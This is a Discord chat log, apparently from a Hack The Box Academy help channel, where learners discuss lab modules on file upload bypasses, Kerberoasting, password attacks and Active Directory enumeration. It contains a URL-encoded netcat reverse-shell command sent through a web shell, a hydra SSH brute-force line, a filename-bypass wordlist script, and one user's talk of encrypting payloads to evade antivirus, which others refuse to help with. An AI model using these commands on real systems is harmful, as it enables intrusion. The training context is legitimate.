i tried xd

sly dome
#

cya nerd

rustic sage
#

Why is everyone so mad?

sly dome
#

no one is mad

rustic sage
#

He is trying to learn isnโ€™t it?

sly dome
#

please read

rustic sage
#

no they're trying to do something that is illegal

#

and we all knew it from the start which is why no one is helping them

fossil parrot
#

Anyone can give hint?

rustic sage
#

and considering the fact they're using metasploit they'll probably get caught

vital adder
rustic sage
sly dome
rustic sage
acoustic owl
sly dome
#

xor aes for hack servers !??!?!?

#

like wth is that

rustic sage
#

no

sly dome
rustic sage
#

yes

#

thats for payload encryption

#

social engineering

#

xd

sly dome
#

now social engineering

rustic sage
#

anyway

sly dome
#

im done

vital adder
rustic sage
#

i tried to ask

lusty thicket
rustic sage
#

at least i decrease av detection a lot xd

acoustic owl
rustic sage
#

so thats why i asked for packers

sly dome
#

yes virustotal is a very realistic source

vital adder
rustic sage
#

you're doing something illegal and no one is going to help you

acoustic owl
lusty thicket
sly dome
#

is the weekend an active time period for this type of events?

#

ive noticed it

acoustic owl
#

free from school ๐Ÿคท๐Ÿปโ€โ™‚๏ธ

vital adder
#

if you stay here a good while you could enjoy this like every other days and it's was worse before

rustic sage
#

it happens a lot in Academy since it's a public channel

sly dome
#

i see

#

at least we had a good time

vital adder
# fossil parrot Anyone can give hint?

everyone missed this through the lol but you are on Server-side Attacks Skills Assessment right? hint stop using tplmap or any automatic tool (as the other dump dump learn) and enum the page source code manually

sly dome
#

it made me laugh the xor aes part

sly dome
#

love when academy questions have a little think outside of the box

rustic sage
#

just use metasploit tbh that's what i've learned today

#

metasploit can do anything

acoustic owl
sly dome
#

the without registering an account is a huge hint @fossil parrot

rustic sage
#

keep using metasploit and you'll get there kiddo

#

i believe in you

rustic sage
#

nvm thanks for support guys

#

see u

#

you've said bye like five times now... is this time for real?

rustic sage
#

yes

cedar void
#

"Find the existing exploit in MSF and use it to get a shell on the target. What is the username of the user you obtained a shell with? "

Once we find the exploit, will we need to use the exploit to find the user name in the system once we are in the system or is the username something we already need to know through other means?

rustic sage
#

(assuming it was successful)

#

if you're already on the system, have RCE, or LFI, then yes you could probably cheat and figure it out, but that's not the point of the module/section

cedar void
rustic sage
#

i ran sharhound in powershell now im trying to import the file into bloodhound but i get an error "bad json file" anyone know why

sly dome
#

otherwise you are just wasting your time xd

rustic sage
vital adder
lusty thicket
vital adder
sly dome
#

without registering

lusty thicket
#

and try again

fathom pendant
gloomy bramble
#

For PtTf from Linux under Password attacks: Is /tmp/krb5cc_647401106_HRJDux not correct to use? Exercise: Check the /tmp directory and find Julio's Kerberos ticket (ccache file). Import the ticket and read the contents of julio.txt from the domain share folder \DC01\julio. I have tried everything from limikatz the ls -la /tmp, klist, etc.. and this is the only one for julio that doesnt look expired. cp --> export, not working for me.

cedar void
gloomy bramble
vital adder
sly dome
#

HAHAHAHAHA

fathom pendant
sly dome
#

w8 do you have life apart from hacking

vital adder
#

never heard of that

fathom pendant
#

Un poquito

sly dome
gloomy bramble
# fathom pendant There's another one

Found the ticket. Weird that it showed up later after using some of the same commands. Now just need to figure out how to traverse as that not working either lol. bastages

fathom pendant
#

Some of the tickets are expired

slender shoal
tender lake
#

I need some help with the Windows Privilege Escalation Skill Assessment 1.
I have a full tty shel on the target and I am trying to upload a file to the box, but herein lies my problem(s) I do not know where I can Download a file to, and I cant find anywhere.

acoustic sparrow
#

hey bro currently into the password attacking module medium lab got ssh access and looking around found a local mysql and a debian_create_root_user.sql
am i on the right track? sry for asking

fathom pendant
#

Just enumerate with creds you have

gloomy bramble
chilly cosmos
acoustic sparrow
acoustic sparrow
#

found the other creds now its time to dig into Ds ssh

tender lake
warm drift
#
hydra -l b.gates -P '\william.txt' -u -f ssh://83.136.253.147:53372 -t 4
#

doesn't give any hits

#

what password list are we supposed to use?

sly dome
#

the cupp generated

warm drift
#

that's what I used

#

I gave first last and nickname

sly dome
#

just follow step by step from previous section

#

also use the sed commands

hallow kiln
#

you need everything that's shown in the module, not just whatever you feel like giving

sly dome
#

they literally give you the exercise done

tame ivy
#

Module: Active Directory, Section: Credentialed Enum, trying connect to the box, but there is black screen and it is not working, could anyone help please?

fathom pendant
tame ivy
#

yeah, its not working

fathom pendant
#

Enter?

tame ivy
#

oh it worked, thank you

fathom pendant
#

Almost like this question has been asked

#

1000 times

tame ivy
#

oh sorry i didnt know haha

sly dome
#

the good screensaver

hallow kiln
#

it got me too the first time, I switched to Remmina, then saw the answer here the next day lol

fathom pendant
#

Screensaver the best AV/Defender

hallow kiln
#

yeah, gotta put that in my recommendations, black hats gonna be like "guess those creds don't work, we've been thwarted, guys"

peak rover
#

hello everyone, I would like to ask for help, I am 17 years old, I would like to study for a base in the field of cybersecurity to learn how to solve CTF tasks, who can give advice or resources to study

#

thank you in advance

cedar void
#

I don't understand why this command isn't working in msfconsole. I tried fixing the issues with the suggestions that were I asked what to do when the 'db_nmap' command doesn't work and none of the suggestions I tried worked: db_nmap -sV -p- -T5 -A 10.129.239.61

rustic sage
cedar void
rustic sage
rustic sage
cedar void
rustic sage
#

if it's not practical it's an awful resource

#

you most likely won't succeed when doing boxes or when first starting on HTB Academy, but you will be challenged and learn.
you will not learn on THM it's awful

cedar void
#

but THM definitely has some practical rooms for sure

rustic sage
#

if you want to waste your time be my guest.
i've tried both platforms and i've been challenged and learned far more here than they ever taught me

obtuse oxide
#

How can I do proper encoding on bigger terminal commands to run them on my web shells? Basically converting commands into url format?

rustic sage
#

base64 encode?

obtuse oxide
#

Isn't that just encryption? For example I saw Ippsec doing ctrl + U on burp suite to convert his reverse shell into url format

#

This is what I'm talking about

upper ruin
#

@0ั… Sir, I made a little progress on yesterday's task with the footprinting lab 2.

obtuse oxide
#

I think ./urlencode might be what I'm looking for lmao

outer thorn
obtuse oxide
#

urlencode doesn't seem to work big_think

outer thorn
obtuse oxide
obtuse oxide
#

Ah you can't share images

#

?cmd=id seemed to work

#

but if I do

outer thorn
fast verge
#

any help with this>>>>>>>CertUtil: -URLCache command FAILED: 0x80190195 (-2145844843)
CertUtil: Error 0x80190195 (-2145844843)

obtuse oxide
#

?cmd=rm+%2Ftmp%2Ff%3Bmkfifo+%2Ftmp%2Ff%3Bcat+%2Ftmp%2Ff%5C%7C%2Fbin%2Fsh+-i+2%3E%261%5C%7Cnc+10.10.15.95+1337+%3E%2Ftmp%2Ff it doesn't work

obtuse oxide
outer thorn
obtuse oxide
#

Well it's an academy module anyways, so I'm just trying to learn different methods

remote ginkgo
#

Hey any one faced the issues while installing parrot os hackthebox edition

obtuse oxide
#

Who knows, in the future maybe I only have the option to use a web shell

remote ginkgo
#

Tried 3 times gets cancelled in 91 percent

lusty thicket
remote ginkgo
#

Yes it's a lot irritating ๐Ÿ˜‚

#

It's still stuck at 91 percent and shows the error 600 sec and something can't tune the command stuff

#

Run*

analog dock
lusty thicket
remote ginkgo
#

Yes

#

Tried YouTube didn't got the reasons

analog dock
#

This channel is for academy modules

remote ginkgo
#

I am too learning from academy but this os is giving me a headache

#

No issues

tame ivy
#

Module: Active Directory,Section: Kerberoasting From Linux, i connected to ssh, it says to use GetUserSPNs, but it requesting a password, and i do not have password, could anyone help please?

rustic sage
shut wraith
#

Hello guyskies

shut wraith
#

I am uploading a shell.php to a vulnerable web app successfully. When I navigate to the uploaded shell using the URL. It DOWNLOADS the shell script instead of running it. Now I have a bunch of shell scripts downloaded

#

Would appreciate any insight

rustic sage
# tame ivy oh understood, thx u sir

from what i've seen it only happens in that module, but yes definitely write them down and reuse them because you'll need them in future sections as well

shut wraith
#

Hey @rustic sage can u help me once again?

rustic sage
#

what module is it

shut wraith
#

The page before it I did the same thing and it ran the shell.php script. But this time it just keeps downloading it when I navigate to it. So weird

#

Any luck @rustic sage

rustic sage
#

i'm working on the new box if you still need help later i'll be around
try restarting the box, rereading the module, double check what you're uploading

undone narwhal
shut wraith
shut wraith
undone narwhal
rustic sage
#

im a little bit confused on the kerberoasting from linux module the question is "What powerful local group on the Domain Controller is the SAPService user a member of?" so i tried all kinds of things but cant figure it out can someone give a hint on what i need to do

shut wraith
undone narwhal
shut wraith
undone narwhal
shut wraith
#

Yeah they all just download

undone narwhal
#

I used Brup so i never had files download, but again one extension will work

shut wraith
#

.phpt returned a Not Found

undone narwhal
rustic sage
# undone narwhal what did you try?

well i found his group rid 0x201 then listed the groups the group with the rid 0x201 is Domain Users so i submitted this but it says its incorrect

shut wraith
undone narwhal
undone narwhal
pale vale
#

i have no idea what this server is about i got it from network chuch

#

cuch

#

idk how to spell

#

im not like a small child i just dont know

shut wraith
acoustic sparrow
#

finally i smacked the medium lab for password attacks

indigo flax
quasi wave
#

I have been reading about how IDS/IPS passively prevents traffic from entering network, making it harder to detect than a firewall which does so actively.

I understand this in the context of IDS. With IPS I understand it less because it says it "prevents" attacks. If its blocking the traffic then how does it "prevent" attacks "passively" and what's the difference between blocking "passively" and blocking "actively?"

rustic sage
#

not the place for this.

rustic sage
outer thorn
tame ivy
#

Guys why when i typing this command my terminal is holding and not exeting a command, on Active Directory module:
Get-DomainObjectACL -Identity * | ? {$_.SecurityIdentifier -eq $sid}

quasi wave
orchid pine
#

It wasnโ€™t working

tame ivy
#

how did u completed this section?

#

i also asked help to chatgpt, but given commands are not working

orchid pine
#

Can u tell me wich section this

#

Its a bout acl abuse right

tame ivy
#

yeah

#

on windows

analog dock
#

<@&861185840277487616> looks like some scam again

#

Especially with that bio

sly dome
#

we can copy paste for you the results

quasi wave
sly dome
#

the modules do not possess the absolute truth

quasi wave
#

I know but I figured it out

#

I got question answered

sly dome
#

๐Ÿ‘๐Ÿฝ

shut wraith
#

FILE UPLOAD ATTACKS

Whitelist Filters

The above exercise employs a blacklist and a whitelist test to block unwanted extensions and only allow image extensions. Try to bypass both to upload a PHP script and execute code to read "/flag.txt"
I have used the script provided and added to it all .php extensions as follows:

    for ext in '.php' '.phps' '.jpeg.php' '.jpg.php' '.png.php' '.php' '.php3' '.php4' '.php5' '.php7' '.php8' '.pht' '.phar' '.phpt' '.pgif' '.phtml' '.phtm>
        echo "shell$char$ext.jpg" >> wordlist.txt
        echo "shell$ext$char.jpg" >> wordlist.txt
        echo "shell.jpg$char$ext" >> wordlist.txt
        echo "shell.jpg$ext$char" >> wordlist.txt
    done
done```
I used burpsuite intruder until the machine timed out after an hour:
Please help
sly dome
#

2nd step: bypass whitelist

#

this is a blacklist message

#

this is a whitelist message

shut wraith
#

Wait so are u saying that it's because my "image data" is a php shell code?

sly dome
#

this exercise doesnot check the content

#

only extensions

shut wraith
#

Okay but doesnt the script try to bypass both?

sly dome
#

you have to find 1 extension that returns "Only images are allowed"

sly dome
#

idk

shut wraith
#

All of them above as u can see return that

sly dome
#

what scriptHAHA

shut wraith
#

This script makes a wordlist:

    for ext in '.php' '.phps' '.jpeg.php' '.jpg.php' '.png.php' '.php' '.php3' '.php4' '.php5' '.php7' '.php8' '.pht' '.phar' '.phpt' '.pgif' '.phtml' '.phtm>
        echo "shell$char$ext.jpg" >> wordlist.txt
        echo "shell$ext$char.jpg" >> wordlist.txt
        echo "shell.jpg$char$ext" >> wordlist.txt
        echo "shell.jpg$ext$char" >> wordlist.txt
    done
done```
#
shell:.phtml.jpg
shell.phtml:.jpg
shell.jpg:.phtml
shell.jpg.phtml:
shell:.phtm.jpg
shell.phtm:.jpg
shell.jpg:.phtm
shell.jpg.phtm:
shell:.php%00.gif.jpg
shell.php%00.gif:.jpg
shell.jpg:.php%00.gif
shell.jpg.php%00.gif:
shell:.php\x00.gif.jpg
shell.php\x00.gif:.jpg
shell.jpg:.php\x00.gif
shell.jpg.php\x00.gif:
shell:.php%00.png.jpg
shell.php%00.png:.jpg
shell.jpg:.php%00.png
shell.jpg.php%00.png:
shell:.php\x00.png.jpg
shell.php\x00.png:.jpg
shell.jpg:.php\x00.png
shell.jpg.php\x00.png:
shell:.php%00.jpg.jpg
shell.php%00.jpg:.jpg
shell.jpg:.php%00.jpg
shell.jpg.php%00.jpg:
shell:.php\x00.jpg.jpg
shell.php\x00.jpg:.jpg
shell.jpg:.php\x00.jpg
shell.jpg.php\x00.jpg:
#

Like this

sly dome
#

one of the allowed extensions is .phar.png for example

#

idk

#

you can do this one manually

#

1st you find one extension of php that is not blacklisted and then you bypass the "Only images" filter

#

is not that difficult you are overcomplicating it with a bash script

#

as usual. find a method before a tool do it for you

shut wraith
sly dome
#

?

#

it will tell if its uploaded or not,

#

if it says no you can suppose there is a filter and you start playing, but you do not start with 900 extensions